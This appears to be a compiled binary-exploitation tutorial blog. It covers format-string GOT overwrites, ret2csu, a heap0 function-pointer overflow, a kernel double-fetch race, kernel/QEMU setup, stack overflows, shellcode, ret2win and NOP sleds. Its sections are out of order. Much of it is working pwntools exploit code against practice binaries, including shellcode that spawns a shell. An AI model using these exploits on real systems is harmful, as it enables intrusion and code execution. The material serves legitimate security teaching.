The very simplest of possible GOT-overwrite binaries.
Infinite loop which takes in your input and prints it out to you using printf - no buffer overflow, just format string. Let's assume ASLR is disabled - have a go yourself :)
Exploitation
As per usual, set it all up
Now, to do the %n overwrite, we need to find the offset until we start reading the buffer.
Looks like it's the 5th.
Yes it is!
Now, next time printf gets called on your input it'll actually be system!
If the buffer is restrictive, you can always send /bin/sh as your next input - since printf is now system, that input gets run as a command and drops you into a shell where you can run longer commands.
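As a rough sketch of what this can look like with pwntools - the binary name and libc base here are assumptions (ASLR is disabled), and the format string offset of 5 is the one we just found:

from pwn import *

elf = context.binary = ELF('./vuln')       # hypothetical binary name
libc = elf.libc
libc.address = 0xf7dc2000                  # example libc base - check yours with ldd

p = process()

# use %n writes to replace printf's GOT entry with the address of system
payload = fmtstr_payload(5, {elf.got['printf']: libc.sym['system']})
p.sendline(payload)
p.clean()

# printf(buffer) is now system(buffer), so sending /bin/sh pops a shell
p.sendline(b'/bin/sh')
p.interactive()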
Final Exploit
64-bit
You'll never guess. That's right! You can do this one by yourself.
ASLR Enabled
If you want an additional challenge, re-enable ASLR and do the 32-bit and 64-bit exploits again; you'll have to leverage what we've covered previously.
ret2csu is a technique for populating registers when there is a lack of gadgets. More information can be found in the original paper, but a summary is as follows:
When an application is dynamically compiled (compiled with libc linked to it), there is a selection of functions it contains to allow the linking. These functions contain within them a selection of gadgets that we can use to populate registers we lack gadgets for, most importantly __libc_csu_init, which contains the following two gadgets:
The second might not look like a gadget, but if you look closely it calls [r15 + rbx*8]. The first gadget chain allows us to control both r15 and rbx in that series of huge pop operations, meaning we can control where the second gadget calls afterwards.
Note it's call qword [r15 + rbx*8], not call qword r15 + rbx*8. This means it'll calculate r15 + rbx*8, go to that memory address, read it, and call the value stored there. This means we have to find a memory address that contains where we want to jump.
These gadget chains allow us, despite an apparent lack of gadgets, to populate the RDX and RSI registers (which are important for parameters) via the second gadget, then jump wherever we wish by simply controlling r15 and rbx to workable values.
This means we can potentially pull off syscalls for execve, or populate parameters for functions such as write().
You may wonder why we would do something like this if we're linked to libc - why not just read the GOT? Well, some functions - such as write() - require three parameters, so if the binary lacks gadgets to control rsi and rdx we would need ret2csu to populate them.
0x004011a2 5b pop rbx
0x004011a3 5d pop rbp
0x004011a4 415c pop r12
0x004011a6 415d pop r13
0x004011a8 415e pop r14
0x004011aa 415f pop r15
0x004011ac c3 ret
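To make the layout concrete, here is a rough pwntools sketch of such a chain. The second gadget's address, the exact mapping of r12/r13/r14 onto the argument registers and the writable address holding the pointer we call are all hypothetical - pull the real values from your own binary's disassembly:

from pwn import *

context.arch = 'amd64'

CSU_POPPER = 0x4011a2    # the pop rbx; ...; pop r15; ret chain shown above
CSU_CALLER = 0x401188    # hypothetical: mov rdx/rsi/edi from r14/r13/r12, then call [r15 + rbx*8]
FUNC_PTR   = 0x404028    # hypothetical writable address containing a pointer to the function we want

chain  = p64(CSU_POPPER)
chain += p64(0)          # rbx = 0, so the call dereferences [r15 + 0*8]
chain += p64(1)          # rbp = 1, so the add rbx, 1; cmp rbp, rbx check after the call passes
chain += p64(0x1)        # r12 -> typically ends up in edi (first parameter)
chain += p64(0x2)        # r13 -> typically ends up in rsi (second parameter)
chain += p64(0x3)        # r14 -> typically ends up in rdx (third parameter)
chain += p64(FUNC_PTR)   # r15 -> [r15] is what actually gets called
chain += p64(CSU_CALLER)
chain += p64(0) * 7      # the caller falls through into the popper again: add rsp, 8 plus six pops
chain += p64(0xdeadbeef) # the final ret lands here - the next step of your ROP chain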
heap0
http://exploit.education/phoenix/heap-zero/
Source
Luckily it gives us the source:
Analysis
So let's analyse what it does:
Allocates two chunks on the heap
Sets the fp variable of chunk f to the address of nowinner
The weakness here is clear - it calls a function pointer stored on the heap. Our input is copied there after the pointer is set, and there's no bounds checking whatsoever, so we can overrun it easily.
Regular Execution
Let's check out the heap in normal conditions.
We'll break right after the strcpy and see how it looks.
If we want, we can check the contents.
So, we can see that the function address is there, after our input in memory. Let's work out the offset.
Working out the Offset
Since we want to work out how many characters we need until the pointer, I'll just use a De Bruijn pattern.
Let's break on and after the strcpy. That way we can check the location of the pointer then immediately read it and calculate the offset.
So, the chunk with the pointer is located at 0x2493060. Let's continue until the next breakpoint.
radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.
Notice we overwrote the size field, so the chunk is much bigger. But now we can easily use the first value to work out the offset (we could also, knowing the location, have done pxq @ 0x02493060).
So, fairly simple - 80 characters, then the address of winner.
Exploit
We need to remove the null bytes because argv doesn't allow them
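A sketch of what the exploit could look like with pwntools, assuming a 64-bit binary at ./heap0 (the 80-byte offset we found matches a 64-bit heap layout); the trailing null bytes of the packed address are stripped so argv will accept it:

from pwn import *

elf = context.binary = ELF('./heap0')    # assumed path to the challenge binary

# 80 bytes of padding up to the fp field of the second chunk, then winner()
payload = b'A' * 80 + p64(elf.sym['winner']).rstrip(b'\x00')

p = process([elf.path, payload])
print(p.clean().decode())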
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct data {
  char name[64];
};

struct fp {
  void (*fp)();
  char __pad[64 - sizeof(unsigned long)];
};

void winner() {
  printf("Congratulations, you have passed this level\n");
}

void nowinner() {
  printf(
      "level has not been passed - function pointer has not been "
      "overwritten\n");
}

int main(int argc, char **argv) {
  struct data *d;
  struct fp *f;

  if (argc < 2) {
    printf("Please specify an argument to copy :-)\n");
    exit(1);
  }

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  strcpy(d->name, argv[1]);

  printf("data is at %p, fp is at %p, will be calling %p\n", d, f, f->fp);
  fflush(stdout);

  f->fp();

  return 0;
}
We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:
If we attempt to read() from the device, it checks the authenticated flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!.
In order to update authenticated, we have to write() to the kernel module. What we attempt to write is compared to p4ssw0rd. If it's not equal, nothing happens. If it is, authenticated is updated and the next time we read() it'll return the flag!
Interacting
Let's first try and interact with the kernel by reading from it.
Make sure you sudo chmod 666 /dev/authentication!
We'll start by opening the device and reading from it.
Note that in the module source code, the length of read() is completely disregarded, so we could make it any number at all! Try switching it to 1 and you'll see.
After compiling, we get that we are not authenticated:
Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user() does not automatically add it, so the strcmp will fail otherwise!
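If you just want to poke at the module quickly, the same interaction can also be scripted from Python (assuming the device is /dev/authentication and the password is p4ssw0rd, as above):

import os

fd = os.open('/dev/authentication', os.O_RDWR)

print(os.read(fd, 100))          # FAIL: Not Authenticated!

os.write(fd, b'p4ssw0rd\x00')    # the null byte matters - copy_from_user() won't add it

print(os.read(fd, 100))          # now returns the flag
os.close(fd)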
It works!
Amazing! Now for something really important:
The state is preserved between connections! Because the kernel module stays loaded, you will remain authenticated until the module is reloaded (either via rmmod then insmod, or a system restart).
Final Code
Challenge - IOCTL
So, here's your challenge! Write the same kernel module, but using ioctl instead. Then write a program to interact with it and perform the same operations. A ZIP file including both is below, but no cheating! This is really good practice.
In reality, there won't be a 1-second sleep for your race condition to occur. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!
This will not work every time - in fact, it's quite likely not to work! - so we will instead have two loops: one that keeps writing 0 to the ID, and another that writes a different value - e.g. 900 - and then calls write(). The aim is for the thread that switches the ID to 0 to sync up so perfectly that the switch occurs in between the ID check and the ID "assignment".
Analysis
If we check the source, we can see that there is no msleep any longer:
Exploitation
Our exploit is going to look slightly different! We'll create the Credentials struct again and set the ID to 900:
Then we are going to write this struct to the module repeatedly. We will loop it 1,000,000 times (effectively infinite) to make sure it terminates:
If the ID returned is 0, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.
Now, in the second thread, we will constantly cycle between ID 900 and 0. We do this in the hope that it will be 900 on the first dereference, and 0 on the second! I make this loop infinite because it is a thread, and the thread will be killed when the program is (provided you remove pthread_join()! Otherwise your main thread will wait forever for the second to stop!).
Compiling the exploit and running it, we get the desired result:
Look how quick that was! Insane - two fails, then a success!
Race Analysis
You might be wondering how tight the race window can be for exploitation - well, here we had a race of just two assembly instructions:
The dereferences of [rbx] have just one assembly instruction between them, yet we are still capable of winning the race. THAT is just how tight it can be!
Compiling, Customising and booting the Kernel
Instructions for compiling the kernel with your own settings, as well as compiling kernel modules for a specific kernel version.
This isn't necessary for learning how to write kernel exploits - all the important parts will be provided! This is just to help those hoping to write challenges of their own, or perhaps set up their own VMs for learning purposes.
Prerequisites
There may be other requirements - these are just the ones I already had installed. Check the kernel documentation for the full list.
The Kernel
Cloning
Use --depth 1 to only get the last commit.
Customise
Remove the current compilation configurations, as they are quite complex for our needs
Now we can create a minimal configuration, with almost all options disabled. A .config file is generated with the least features and drivers possible.
We create a kconfig file with the options we want to enable. An example is the following:
Explanation of Options
CONFIG_64BIT - compiles the kernel for 64-bit
CONFIG_SMP - simultaneous multiprocessing; allows the kernel to run on multiple cores
CONFIG_PRINTK, CONFIG_PRINTK_TIME - enables log messages and timestamps
CONFIG_PCI - enables PCI bus support
CONFIG_BLK_DEV_INITRD - enables support for loading an initial RAM disk (our initramfs)
CONFIG_RD_GZIP - enables support for gzip-compressed initrd images
CONFIG_BINFMT_ELF - enables support for executing ELF binaries
CONFIG_BINFMT_SCRIPT - enables executing scripts with a shebang (#!) line
CONFIG_DEVTMPFS - enables automatic creation of device nodes in /dev at boot time using devtmpfs
CONFIG_INPUT - enables support for the generic input layer required for input device handling
CONFIG_INPUT_EVDEV - enables support for the event device interface, which provides a unified input event framework
CONFIG_INPUT_KEYBOARD - enables support for keyboards
CONFIG_MODULES - enables support for loading and unloading kernel modules
CONFIG_KPROBES - set to n to disable kprobes, a kernel-based debugging mechanism we don't need here
CONFIG_LTO_NONE - disables Link Time Optimization (LTO) for kernel compilation. This is to allow better debugging
CONFIG_SERIAL_8250, CONFIG_SERIAL_8250_CONSOLE - enables the 8250/16550 serial driver and lets the kernel console run over a serial port (needed for console=ttyS0 under QEMU)
CONFIG_EMBEDDED - set to n to disable optimizations/features for embedded systems
CONFIG_TMPFS - enables support for the tmpfs in-memory filesystem
CONFIG_RELOCATABLE - builds a relocatable kernel that can be loaded at different physical addresses
CONFIG_RANDOMIZE_BASE - enables KASLR support
CONFIG_USERFAULTFD - enables support for the userfaultfd system call, which allows handling of page faults in user space
In order to update the minimal .config with these options, we use the provided merge_config.sh script:
Building
That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage. This is the same bzImage that you get in CTF challenges.
Kernel Modules
To compile a kernel module, we use the following Makefile structure:
To compile it for a different kernel, all we do is change the -C flag to point to the newly-compiled kernel rather than the system's:
The module is now compiled for the specific kernel version!
Booting the Kernel in a Virtual Machine
Creating the File System and Executables
We now have a minimal kernel bzImage and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.
To do this, we use busybox, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs in as little space as possible.
We will download and extract busybox; you can find the latest version on the official website.
We also create an output folder for compiled versions.
Now compile it statically. We're going to use the menuconfig option, so we can make some choices.
Once the menu loads, hit Enter on Settings. Hit the down arrow key until you reach the option Build static binary (no shared libs). Hit Space to select it, and then Escape twice to leave. Make sure you choose to save the configuration.
Now, make it with the new options
Now we make the file system.
The last thing missing is the classic init script, which gets run on system load. A provisional one works fine for now:
Make it executable
Finally, we're going to bundle it into a cpio archive, which is understood by QEMU.
The -not -name *.cpio is there to prevent the archive from including itself
You can even compress the filesystem to a .cpio.gz file, which QEMU also recognises
If we want to extract the cpio archive (say, during a CTF) we can use this command:
Loading it with QEMU
Put bzImage and initramfs.cpio into the same folder. Write a short run.sh script that loads QEMU:
Explanation of Flags
-kernel bzImage - sets the kernel to be our compiled bzImage
-initrd initramfs.cpio - provide the file system
-append ... - the kernel command line; in the future, this flag is also used to set protections
    console=ttyS0 - directs kernel messages to the first serial port (ttyS0)
    quiet - only show critical messages from the kernel
    loglevel=3 - only show error messages and higher-priority messages
    oops=panic - make the kernel panic immediately on an oops (kernel error)
-monitor /dev/null - disable the QEMU monitor
-nographic - disable the GUI and operate in headless mode (faster)
-no-reboot - do not automatically restart the VM when encountering a problem (useful for debugging and working out why it crashes, as the crash logs will stay)
Once we make this executable and run it, we get loaded into a VM!
User Accounts
Right now, we have a minimal linux kernel we can boot, but if we try and work out who we are, it doesn't act quite as we expect it to:
This is because /etc/passwd and /etc/group don't exist, so we can just create those!
Loading the Kernel Module
The final step is, of course, loading the kernel module. I will be using the module from the Double Fetch section for this step.
First, we copy the .ko file to the filesystem root. Then we modify the init script to load it, and also set the UID of the loaded shell to 1000 (so we are not root!).
Here I am assuming that the major number of the double_fetch module is 253.
Why am I doing that?
If we load into a shell and run cat /proc/devices, we can see that double_fetch is loaded with major number 253 every time. I can't find any way to load it in without guessing the major number, so we're sticking with this for now - please get in touch if you find one!
Compiling a Different Kernel Version
If we want to compile a kernel version that is not the latest, we'll dump all the tags:
It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:
We then continue from there.
Some tags seem to not have the correct header files for compilation. Others, weirdly, build successfully but then never load in QEMU. I'm not quite sure why, to be frank.
if (creds->id == 0) {
    printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
    return -1;
}

printk("[Double-Fetch] Attempting login...");

if (!strcmp(creds->password, PASSWORD)) {
    id = creds->id;
    printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
    return id;
}
// don't want to make the loop infinite, just in case
for (int i = 0; i < 1000000; i++) {
    // now we write the cred struct to the module
    res_id = write(fd, &creds, 0);

    // if res_id is 0, stop the race
    if (!res_id) {
        puts("[+] ID is 0!");
        break;
    }
}
~ $ ./exploit
FD: 3
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[+] ID is 0!
[-] Finished race
; note that rbx is the buf argument, user-controlled
cmp dword ptr [rbx], 5
ja default_case
mov eax, [rbx]
mov rax, jump_table[rax*8]
jmp rax
$ make allnoconfig
YACC scripts/kconfig/parser.tab.[ch]
HOSTCC scripts/kconfig/lexer.lex.o
HOSTCC scripts/kconfig/menu.o
HOSTCC scripts/kconfig/parser.tab.o
HOSTCC scripts/kconfig/preprocess.o
HOSTCC scripts/kconfig/symbol.o
HOSTCC scripts/kconfig/util.o
HOSTLD scripts/kconfig/conf
#
# configuration written to .config
#
CONFIG_64BIT=y
CONFIG_SMP=y
CONFIG_PRINTK=y
CONFIG_PRINTK_TIME=y
CONFIG_PCI=y
# We use an initramfs for busybox with elf binaries in it.
CONFIG_BLK_DEV_INITRD=y
CONFIG_RD_GZIP=y
CONFIG_BINFMT_ELF=y
CONFIG_BINFMT_SCRIPT=y
# This is for /dev file system.
CONFIG_DEVTMPFS=y
# For the power-down button (triggered by qemu's `system_powerdown` command).
CONFIG_INPUT=y
CONFIG_INPUT_EVDEV=y
CONFIG_INPUT_KEYBOARD=y
CONFIG_MODULES=y
CONFIG_KPROBES=n
CONFIG_LTO_NONE=y
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y
CONFIG_EMBEDDED=n
CONFIG_TMPFS=y
CONFIG_RELOCATABLE=y
CONFIG_RANDOMIZE_BASE=y
CONFIG_USERFAULTFD=y
#!/bin/sh
insmod /double_fetch.ko
mknod /dev/double_fetch c 253 0
chmod 666 /dev/double_fetch
mount -t proc none /proc
mount -t sysfs none /sys
mknod -m 666 /dev/ttyS0 c 4 64
setsid /bin/cttyhack setuidgid 1000 /bin/sh
$ git fetch --tags
$ git checkout v5.11
De Bruijn Sequences
The better way to calculate offsets
A De Bruijn sequence of order n is simply a sequence in which no string of n characters is repeated. This makes finding the offset until EIP much simpler - we can just pass in a De Bruijn sequence, get the value within EIP and find the one possible match within the sequence to calculate the offset. Let's do this on the ret2win binary.
Generating the Pattern
Again, radare2 comes with a nice command-line tool (called ragg2) that can generate it for us. Let's create a sequence of length 100.
The -P specifies the length while -r tells it to show ascii bytes rather than hex pairs.
Using the Pattern
Now we have the pattern, let's just input it in radare2 when prompted for input, make it crash and then calculate how far along the sequence the EIP is. Simples.
The address it crashes on is 0x41534141; we can use radare2's in-built wopO command to work out the offset.
Awesome - we get the correct value!
We can also be lazy and not copy the value.
The backticks mean the dr eip is calculated first, before the wopO is run on the result of it.
$ r2 -d -A vuln
[0xf7ede0b0]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0
[0x41534141]> wopO 0x41534141
52
[0x41534141]> wopO `dr eip`
52
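pwntools can generate and search the same kind of pattern with cyclic, if you would rather stay in Python - a quick sketch:

from pwn import *

context.arch = 'i386'

pattern = cyclic(100)            # 100-byte De Bruijn pattern
print(pattern)

# after the crash, look the faulting EIP value up in the pattern
eip_value = 0x6161616c           # hypothetical value read with dr eip
print(cyclic_find(eip_value))    # prints the offset into the pattern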
Stack
Introduction
An introduction to binary exploitation
Binary Exploitation is about finding vulnerabilities in programs and utilising them to do what you wish. Sometimes this can result in an authentication bypass or the leaking of classified information, but occasionally (if you're lucky) it can also result in Remote Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a region of memory that stores temporary variables created by functions in code.
When a new function is called, a memory address in the calling function is pushed to the stack - this way, the program knows where to return to once the called function finishes execution. Let's look at a basic binary to show this.
There are two files - source.c and vuln; the latter is an ELF file, which is the executable format for Linux (it is recommended to follow along with a Virtual Machine of your own, preferably Linux).
We're gonna use a tool called radare2 to analyse the behaviour of the binary when functions are called.
The -d runs it while the -A performs analysis. We can disassemble main with s main; pdf.
s main seeks (moves) to main, while pdf stands for Print Disassembly Function (literally just disassembles it).
The call to unsafe is at 0x080491bb, so let's break there.
db stands for debug breakpoint, and just sets a breakpoint. A breakpoint is simply somewhere which, when reached, pauses the program for you to run other commands. Now we run dc for debug continue; this just carries on running the file.
It should break before unsafe is called; let's analyse the top of the stack now:
pxw tells r2 to analyse the hex as words, that is, 32-bit values. I only show the first value here, which is 0xf7efe000. This value is stored at the top of the stack, as ESP points to the top of the stack - in this case, that is 0xff984af0.
Note that the value 0xf7efe000 is random - it's an artefact of previous processes that have used that part of the stack. The stack is never wiped, it's just marked as usable, so before data actually gets put there the value is completely dependent on your system.
Let's move one more instruction with ds, debug step, and check the stack again. This will execute the call sym.unsafe instruction.
Huh, something's been pushed onto the top of the stack - the value 0x080491c0. This looks like it's in the binary - but where? Let's look back at the disassembly from before:
We can see that 0x080491c0 is the memory address of the instruction after the call to unsafe. Why? This is how the program knows where to return to after unsafe() has finished.
Weaknesses
But as we're interested in binary exploitation, let's see how we can possibly break this. First, let's disassemble unsafe and break on the ret instruction; ret is the equivalent of pop eip, which will get the saved return pointer we just analysed on the stack into the eip register. Then let's continue and spam a bunch of characters into the input and see how that could affect it.
Now let's read the value at the location the return pointer was at previously, which as we saw was 0xff984aec.
Huh?
It's quite simple - we inputted more data than the program expected, which resulted in us overwriting more of the stack than the developer expected. The saved return pointer is also on the stack, meaning we managed to overwrite it. As a result, on the ret, the value popped into eip won't be in the previous function but rather 0x41414141. Let's check with ds.
And look at the new prompt - 0x41414141. Let's run dr eip to make sure that's the value in eip:
Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes when we let it run with dc.
radare2 is very useful and prints out the address that causes it to crash. If you cause the program to crash outside of a debugger, it will usually say Segmentation Fault, which could mean a variety of things, but usually that you have overwritten EIP.
Of course, you can prevent people from writing more characters than expected when making your program, usually using other C functions such as fgets(); gets() is intrinsically unsafe because it doesn't check the length of the input, meaning that the presence of gets() is always something you should check out in a program. It is also possible to give fgets() the wrong parameters, meaning it still takes in too many characters.
Summary
When a function calls another function, it
pushes a return pointer to the stack so the called function knows where to return
when the called function finishes execution, it pops it off the stack again
Because this value is saved on the stack, just like our local variables, if we write more characters than the program expects, we can overwrite the value and redirect code execution to wherever we wish. Functions such as fgets() can prevent such easy overflow, but you should check how much is actually being read.
[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0
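We can reproduce the same crash outside of radare2 with a short pwntools script - a sketch, assuming the binary is ./vuln in the current directory:

from pwn import *

p = process('./vuln')

p.recvline()              # "Overflow me"
p.sendline(b'A' * 100)    # far more than the buffer can hold

p.wait()                  # the process dies with SIGSEGV
print(p.poll())           # -11, i.e. signal 11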
Shellcode
Running your own code
In real exploits, it's not particularly likely that you will have a win() function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.
Shellcode is essentially assembly instructions, except we input them into the binary; once we input it, we overwrite the return pointer to hijack code execution and point at our own instructions!
I promise you can trust me but you should never ever run shellcode without knowing what it does. Pwntools is safe and has almost all the shellcode you will ever need.
The reason shellcode is successful is that the von Neumann architecture (the architecture used in most computers today) does not differentiate between data and instructions - it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore, even though our input is data, the computer doesn't know that - and we can use that to our advantage.
Disabling ASLR
ASLR is a security technique, and while it is not specifically designed to combat shellcode, it involves randomising certain aspects of memory (we will talk about it in much more detail later). This randomisation can make shellcode exploits like the one we're about to do much less reliable, so we'll be disabling it for now.
Again, you should never run commands if you don't know what they do
Finding the Buffer in Memory
Let's debug vuln() using radare2 and work out where in memory the buffer starts; this is where we want to point the return pointer to.
This value that gets printed out is a local variable - due to its size, it's fairly likely to be the buffer. Let's set a breakpoint just after gets() and find the exact address.
It appears to be at 0xffffcfd4; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).
Finding the Padding
Now we need to calculate the padding until the return pointer. We'll use the De Bruijn sequence as explained in the previous blog post.
The padding is 312 bytes.
Putting it all together
In order for the shellcode to be correct, we're going to set context.binary to our binary; this grabs stuff like the arch, OS and bits and enables pwntools to provide us with working shellcode.
We can use just process() because once context.binary is set, it is assumed to use that binary.
Now we can use pwntools' awesome shellcode functionality to make it incredibly simple.
Yup, that's it. Now let's send it off and use p.interactive(), which enables us to communicate with the shell.
If you're getting an EOFError, print out the shellcode and try to find it in memory - the stack address may be wrong
And it works! Awesome.
Final Exploit
Summary
We injected shellcode, a series of assembly instructions, when prompted for input
We then hijacked code execution by overwriting the saved return pointer on the stack and modified it to point to our shellcode
Once the return pointer got popped into EIP, it pointed at our shellcode
This caused the program to execute our instructions, giving us (in this case) a shell for arbitrary command execution
ret2win
The most basic binexp challenge
A ret2win is simply a binary where there is a win() function (or equivalent); once you successfully redirect execution there, you complete the challenge.
To carry this out, we have to leverage what we learnt in the introduction, but in a predictable manner - we have to overwrite EIP, but to a specific value of our choice.
To do this, what do we need to know? Well, a couple things:
The padding until we begin to overwrite the return pointer (EIP)
What value we want to overwrite EIP to
When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped into EIP. The EIP register is not located on the stack, so it is not overwritten directly.
Finding the Padding
This can be found using simple trial and error; if we send a variable number of characters, we can use the Segmentation Fault message, in combination with radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute force (we'll cover this in the next post), but it'll do for now.
You may get a segmentation fault for reasons other than overwriting EIP; use a debugger to make sure the padding is correct.
We get an offset of 52 bytes.
Finding the Address
Now we need to find the address of the flag() function in the binary. This is simple.
afl stands for Analyse Functions List
The flag() function is at 0x080491c3.
Using the Information
The final piece of the puzzle is to work out how we can send the address we want. If you think back to the introduction, the As that we sent became 0x41 - which is the ASCII code of A. So the solution is simple - let's just find the characters with ascii codes 0x08, 0x04, 0x91 and 0xc3.
This is a lot simpler than you might think, because we can specify them in python as hex:
And that makes it much easier.
Putting it Together
Now we know the padding and the value, let's exploit the binary! We can use pwntools to interface with the binary (check out the pwntools introduction for a more in-depth look).
If you run this, there is one small problem: it won't work. Why? Let's check with a debugger. We'll put in a pause() to give us time to attach radare2 onto the process.
Now let's run the script with python3 exploit.py and then open up a new terminal window.
By providing the PID of the process, radare2 hooks onto it. Let's break at the return of unsafe() and read the value of the return pointer.
0xc3910408 - look familiar? It's the address we were trying to send over, except the bytes have been reversed, and the reason for this reversal is endianness. Big-endian systems store the most significant byte (the byte with the largest value) at the smallest memory address, and this is how we sent them. Little-endian does the opposite (the least significant byte goes at the smallest address), and most binaries you will come across are little-endian. As far as we're concerned, the bytes are stored in reverse order in little-endian executables.
Finding the Endianness
radare2 comes with a nice tool called rabin2 for binary analysis:
So our binary is little-endian.
Accounting for Endianness
The fix is simple - reverse the address (you can also remove the pause())
If you run this now, it will work:
And wham, you've called the flag() function! Congrats!
Pwntools and Endianness
Unsurprisingly, you're not the first person to have thought "could they possibly make endianness simpler" - luckily, pwntools has a built-in p32() function ready for use!
becomes
Much simpler, right?
The only caveat is that it returns bytes rather than a string, so you have to make the padding a byte string:
Otherwise you will get a TypeError.
Final Exploit
Cybersecurity Notes
Welcome to my blog! There's a lot here and it's a bit spread out, so here's a guide:
If you're looking for my binary exploitation notes, you're in the right place! Here I make notes on most of the things I learn, and also provide vulnerable binaries to allow you to have a go yourself. Most "common" stack techniques are mentioned along with some super introductory heap; more will come soon™.
There is the odd set of things on reverse engineering, cryptography and blockchain security too, as well as writeups
All of my non-cryptography maths notes can be found on Notion. I realise having it in multiple locations is annoying, but maths support in Notion is just wayyy better. Like so much better. Sorry.
If you'd like to find me elsewhere, I'm usually down as ir0nstone. The account you'd actually be interested in seeing is likely .
If this resource has been helpful to you, please consider :)
And, of course, thanks to GitBook for all of their support :)
Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing you would need to change is switch out the p32() for p64() as the memory addresses are longer.
The real difference between the two, however, is the way you pass parameters to functions (which we'll be looking at much closer soon); in 32-bit, all parameters are pushed to the stack before the function is called. In 64-bit, however, the first 6 are stored in the registers RDI, RSI, RDX, RCX, R8 and R9 respectively as per the calling convention. Note that different Operating Systems also have different calling conventions.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ r2 -d -A vuln
[0xf7fd40b0]> s sym.unsafe ; pdf
[...]
; var int32_t var_134h @ ebp-0x134
[...]
[0x08049172]> dc
Overflow me
<<Found me>> <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0xffffcfb4 3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7 <<Found me>>....
[...]
$ ragg2 -P 400 -r
<copy this>
$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`
312
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
$ python3 exploit.py
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
ironstone
$ ls
exploit.py source.c vuln
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4) # Address of the Shellcode
log.info(p.clean())
p.sendline(payload)
p.interactive()
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = 'A' * 52
payload += '\x08\x04\x91\xc3'
p.clean() # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
from pwn import *
p = process('./vuln')
payload = 'A' * 52
payload += '\x08\x04\x91\xc3'
log.info(p.clean())
pause() # add this in
p.sendline(payload)
log.info(p.clean())
r2 -d -A $(pidof vuln)
[0x08049172]> db 0x080491aa
[0x08049172]> dc
<< press any button on the exploit terminal window >>
hit breakpoint at: 80491aa
[0x080491aa]> pxw @ esp
0xffdb0f7c 0xc3910408 [...]
[...]
$ rabin2 -I vuln
[...]
endian little
[...]
payload += '\x08\x04\x91\xc3'[::-1]
$ python3 tutorial.py
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!
payload += '\x08\x04\x91\xc3'[::-1]
payload += p32(0x080491c3)
payload = b'A' * 52 # Notice the "b"
TypeError: can only concatenate str (not "bytes") to str
from pwn import * # This is how we import pwntools
p = process('./vuln') # We're starting a new process
payload = b'A' * 52
payload += p32(0x080491c3) # Use pwntools to pack it
log.info(p.clean()) # Receive all the text
p.sendline(payload)
log.info(p.clean()) # Output the "Exploited!" string to know we succeeded
NOPs
More reliable shellcode exploits
NOP (no operation) instructions do exactly what they sound like: nothing. This makes them very useful for shellcode exploits, because all they will do is run the next instruction. If we pad our exploit on the left with NOPs and point EIP at the middle of them, execution will simply slide through the NOPs until it reaches our actual shellcode. This gives us a greater margin of error, as a shift of a few bytes forwards or backwards won't really affect it - it'll just run a different number of NOP instructions, with the same end result of running the shellcode. This padding with NOPs is often called a NOP slide or NOP sled, since EIP is essentially sliding down them.
In intel x86 assembly, NOP instructions are \x90.
The NOP instruction actually used to stand for XCHG EAX, EAX, which does effectively nothing.
Updating our Shellcode Exploit
We can make slight changes to our exploit to do two things:
Add a large number of NOPs on the left
Adjust our return pointer to point at the middle of the NOPs rather than the buffer start
Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location may be different.
